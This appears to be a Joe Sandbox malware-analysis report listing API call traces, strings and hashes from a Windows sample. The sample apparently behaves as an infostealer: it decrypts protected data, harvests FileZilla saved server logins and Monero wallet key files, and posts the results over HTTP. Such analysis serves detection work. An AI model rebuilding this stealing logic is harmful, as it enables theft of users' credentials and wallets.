                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: f966b66c90ada5ffe798ba4505516abd0205e83baeef2c0892f5b7edc2e26e91
                          • Instruction ID: 5969d1abf273983c2598302fee79e8192f9195f0aabe9a2e2e6d80712fbef650
                          • Opcode Fuzzy Hash: f966b66c90ada5ffe798ba4505516abd0205e83baeef2c0892f5b7edc2e26e91
                          • Instruction Fuzzy Hash: C9416E74D1421EDFDB10DFA4DD89FEEBBB8BB48308F1041A8E509A6280D7705A84DFA1
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 0039696C
                          • sscanf.NTDLL ref: 00396999
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003969B2
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003969C0
                          • ExitProcess.KERNEL32 ref: 003969DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                           • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$System$File$ExitProcesssscanf
                          • String ID:
                          • API String ID: 2533653975-0
                          • Opcode ID: f96e8ed0e6c41b52cbf4623ce838ea9621604ca129246919722c1beb07e5aa3c
                          • Instruction ID: 1c0d60252d1f48ffed597e5a55ad1bf9d586b779a637d7e427829fae7fb44487
                          • Opcode Fuzzy Hash: f96e8ed0e6c41b52cbf4623ce838ea9621604ca129246919722c1beb07e5aa3c
                          • Instruction Fuzzy Hash: CD21EA75D1420CAFCF05EFE4D945DEEBBB5BF48304F04852AE406A3250EB345609DBA9
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0038724D
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00387254
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00387281
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 003872A4
                          • LocalFree.KERNEL32(?), ref: 003872AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                           • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: a78d74ef730aa6eab40973c3b3bf991248d381f490d962ce304d20c85af65c8c
                          • Instruction ID: a1473e8d7eb55f4590928e8e807310a642b398fb03e812cecbd6613e7de44a77
                          • Opcode Fuzzy Hash: a78d74ef730aa6eab40973c3b3bf991248d381f490d962ce304d20c85af65c8c
                          • Instruction Fuzzy Hash: DC011275A40308BFEB14DFE4CD4AF9D7BB8EB44704F104555FB05AB2C0D670AA049B65
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0039961E
                          • Process32First.KERNEL32(003A0ACA,00000128), ref: 00399632
                          • Process32Next.KERNEL32(003A0ACA,00000128), ref: 00399647
                          • StrCmpCA.SHLWAPI(?,00000000), ref: 0039965C
                          • CloseHandle.KERNEL32(003A0ACA), ref: 0039967A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                           • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          • Opcode ID: 072a397b65f9a142fed76b571b4c79048c16dcbfbea374d7653b1647ab724729
                          • Instruction ID: 92001967a9b51b1a9a1caa7c455302ce4578fb0f9cb137820c98b675791336ed
                          • Opcode Fuzzy Hash: 072a397b65f9a142fed76b571b4c79048c16dcbfbea374d7653b1647ab724729
                          • Instruction Fuzzy Hash: 6801E5B5A00208AFCF15DFA9CD48BEDBBF8EB58314F104189A90AA6240EB349A44DF51
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                           • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: /h.}$V!8$px<$K[
                          • API String ID: 0-2983324175
                          • Opcode ID: a9579365901a9486a69c35c83b27b4923d1f3ca9dfc1ac411bee77b77db17b35
                          • Instruction ID: d1658e9c077d4ad847d8a6e3f319a7475ed6a717c2964abd0c5de62f4f571a8f
                          • Opcode Fuzzy Hash: a9579365901a9486a69c35c83b27b4923d1f3ca9dfc1ac411bee77b77db17b35
                          • Instruction Fuzzy Hash: AF92E5F350C6049FE304AE2DEC8567AFBE9EF94720F1A493DEAC4C7740E63598058696
                          APIs
                          • CryptBinaryToStringA.CRYPT32(00000000,00385184,40000001,00000000,00000000,?,00385184), ref: 00398EC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                           • Associated: 00000000.00000002.1699316692.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699333650.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000876000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1699507012.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701106467.0000000000886000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701232842.0000000000A2A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1701247475.0000000000A2B000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptString
                          • String ID:
                          • API String ID: 80407269-0
                          • Opcode ID: 28782000c955892bf6cae6a2a13f734c4fb86f7b166ca9d1d1c436a700a90a5e
                          • Instruction ID: 95de1232023111142a99b249e16509b9fce0f1d2a6f817128bc6c96078243a7c
                          • Opcode Fuzzy Hash: 28782000c955892bf6cae6a2a13f734c4fb86f7b166ca9d1d1c436a700a90a5e
                          • Instruction Fuzzy Hash: 26111C70600208BFDF01CF64E884FA737A9AF8A304F109448F9158B250DB35EC41DB60
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00E3E1B8,00000000,?,003A0E10,00000000,?,00000000,00000000), ref: 00397A63
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00397A6A
                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00E3E1B8,00000000,?,003A0E10,00000000,?,00000000,00000000,?), ref: 00397A7D
                          • wsprintfA.USER32 ref: 00397AB7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID:
                          • API String ID: 3317088062-0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &9Vg$JN}$`mE
                          • API String ID: 0-369595573
                          APIs
                          • CoCreateInstance.COMBASE(0039E118,00000000,00000001,0039E108,00000000), ref: 00393758
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 003937B0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID:
                          • API String ID: 123533781-0
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00389B84
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00389BA3
                          • LocalFree.KERNEL32(?), ref: 00389BD3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: +h`%
                          • API String ID: 0-1045090907
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: rU{
                          • API String ID: 0-2083634413
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: {|+<
                          • API String ID: 0-2576279643
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: %7
                          • API String ID: 0-2914357168
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f2d76d7a3c6ed611e8f9e7f35074a357369e499c8d9f1f347aba3931a0cc207d
                          • Instruction ID: 28385804a2d8546d40bee456a2635aa1592172e9ecd185dedf09215dcbd12dd8
                          • Opcode Fuzzy Hash: f2d76d7a3c6ed611e8f9e7f35074a357369e499c8d9f1f347aba3931a0cc207d
                          • Instruction Fuzzy Hash: 19310FB241C7089BE315BF28D88666AFBF0FF18710F06082DE6D582610E7395594CB97
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 21471af7597cdbac20b832b030e940f02cc14cd5be20e817dc4f56631d426da3
                          • Instruction ID: b097a16cd6b7626380d5341592b0284d2934699109ef9c3c88a87231647769a4
                          • Opcode Fuzzy Hash: 21471af7597cdbac20b832b030e940f02cc14cd5be20e817dc4f56631d426da3
                          • Instruction Fuzzy Hash: 3E2105B240C704EFD759BF29D8866AAFBE4EF58710F02482DE6D583650EB31A450CB87
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 00398DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00398E0B
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            • Part of subcall function 003899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003899EC
                            • Part of subcall function 003899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00389A11
                            • Part of subcall function 003899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00389A31
                            • Part of subcall function 003899C0: ReadFile.KERNEL32(000000FF,?,00000000,0038148F,00000000), ref: 00389A5A
                            • Part of subcall function 003899C0: LocalFree.KERNEL32(0038148F), ref: 00389A90
                            • Part of subcall function 003899C0: CloseHandle.KERNEL32(000000FF), ref: 00389A9A
                            • Part of subcall function 00398E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00398E52
                          • GetProcessHeap.KERNEL32(00000000,000F423F,003A0DBA,003A0DB7,003A0DB6,003A0DB3), ref: 00390362
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00390369
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00390385
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 00390393
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 003903CF
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 003903DD
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00390419
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 00390427
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00390463
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 00390475
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 00390502
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 0039051A
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 00390532
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 0039054A
                          • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00390562
                          • lstrcat.KERNEL32(?,profile: null), ref: 00390571
                          • lstrcat.KERNEL32(?,url: ), ref: 00390580
                          • lstrcat.KERNEL32(?,00000000), ref: 00390593
                          • lstrcat.KERNEL32(?,003A1678), ref: 003905A2
                          • lstrcat.KERNEL32(?,00000000), ref: 003905B5
                          • lstrcat.KERNEL32(?,003A167C), ref: 003905C4
                          • lstrcat.KERNEL32(?,login: ), ref: 003905D3
                          • lstrcat.KERNEL32(?,00000000), ref: 003905E6
                          • lstrcat.KERNEL32(?,003A1688), ref: 003905F5
                          • lstrcat.KERNEL32(?,password: ), ref: 00390604
                          • lstrcat.KERNEL32(?,00000000), ref: 00390617
                          • lstrcat.KERNEL32(?,003A1698), ref: 00390626
                          • lstrcat.KERNEL32(?,003A169C), ref: 00390635
                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003A0DB2), ref: 0039068E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 1942843190-555421843
                          • Opcode ID: 4878d69a3dc944da5033a94e811daeabe1e7f714640c979e261586454f72fc96
                          • Instruction ID: a675b7d6eb5ca964119c59deb12c0e28e2475d838f07d6a4316e569390cd4ca6
                          • Opcode Fuzzy Hash: 4878d69a3dc944da5033a94e811daeabe1e7f714640c979e261586454f72fc96
                          • Instruction Fuzzy Hash: 7CD13D72910608AFDF06EBE4DD96EEE7778EF15300F404518F502BA091DF74AA0ADBA1
                          APIs
                            • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                            • Part of subcall function 003847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00384839
                            • Part of subcall function 003847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00384849
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003859F8
                          • StrCmpCA.SHLWAPI(?,00E3EA88), ref: 00385A13
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00385B93
                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00E3EA98,00000000,?,00E3A4B0,00000000,?,003A1A1C), ref: 00385E71
                          • lstrlen.KERNEL32(00000000), ref: 00385E82
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00385E93
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00385E9A
                          • lstrlen.KERNEL32(00000000), ref: 00385EAF
                          • lstrlen.KERNEL32(00000000), ref: 00385ED8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00385EF1
                          • lstrlen.KERNEL32(00000000,?,?), ref: 00385F1B
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00385F2F
                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00385F4C
                          • InternetCloseHandle.WININET(00000000), ref: 00385FB0
                          • InternetCloseHandle.WININET(00000000), ref: 00385FBD
                          • HttpOpenRequestA.WININET(00000000,00E3EA58,?,00E3DFD8,00000000,00000000,00400100,00000000), ref: 00385BF8
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                          • InternetCloseHandle.WININET(00000000), ref: 00385FC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_380000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                          • String ID: "$"$------$------$------$8$X
                          • API String ID: 874700897-1993953560
                          • Opcode ID: d8a23c89ca81b3b93fb8450fa8c98e488846a280cff1c1f8da5a65cf1c488b7e
                          • Instruction ID: e91796b22bdf9f3c62f2f34ef905ec35b1b8af46608005375ee9fcca32ae0383
                          • Opcode Fuzzy Hash: d8a23c89ca81b3b93fb8450fa8c98e488846a280cff1c1f8da5a65cf1c488b7e
                          • Instruction Fuzzy Hash: 1712F171820528ABDF16EBA0DC95FEEB778BF14700F504299F10A66091EF702A49DFA5
                          APIs
                            • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                            • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                            • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                            • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • Part of subcall function 00398B60: GetSystemTime.KERNEL32(003A0E1A,00E3A360,003A05AE,?,?,003813F9,?,0000001A,003A0E1A,00000000,?,00E39168,?,\Monero\wallet.keys,003A0E17), ref: 00398B86
                            • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                            • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0038CF83
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0038D0C7
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0038D0CE
                          • lstrcat.KERNEL32(?,00000000), ref: 0038D208
                          • lstrcat.KERNEL32(?,003A1478), ref: 0038D217
                          • lstrcat.KERNEL32(?,00000000), ref: 0038D22A
                          • lstrcat.KERNEL32(?,003A147C), ref: 0038D239
